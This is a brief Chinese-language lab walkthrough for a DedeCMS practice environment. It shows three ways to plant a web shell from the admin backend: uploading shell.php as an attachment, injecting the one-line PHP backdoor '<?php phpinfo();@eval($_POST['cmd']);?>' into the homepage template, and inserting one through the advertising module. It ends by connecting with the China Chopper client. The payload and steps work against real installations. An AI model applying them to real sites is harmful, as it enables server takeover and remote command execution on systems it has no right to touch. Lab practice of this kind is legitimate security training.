将靶场环境放到www目录下——访问/dedecms/uploads
同意并且继续
配置自己的数据库
进入后台,前端没有什么地方有漏洞
方法一:上传shell文件
后台——核心——附件管理——上传新文件。
访问/dedecms/uploads/uploads/shell.php
方法二:模板修改index.html
模板——默认模板管理——修改主页模板
在代码里面插入一句话木马
<?php phpinfo();@eval($_POST['cmd']);?>
保存
点击生成——更新主页html——配置一下——点击更新。
浏览——访问/dedecms/uploads/index.php
方法三:广告模块任意命令插入shell
利用广告模块
插入一句话木马
点击代码——修改,可以看到我们的路径,去访问
最后用菜刀连接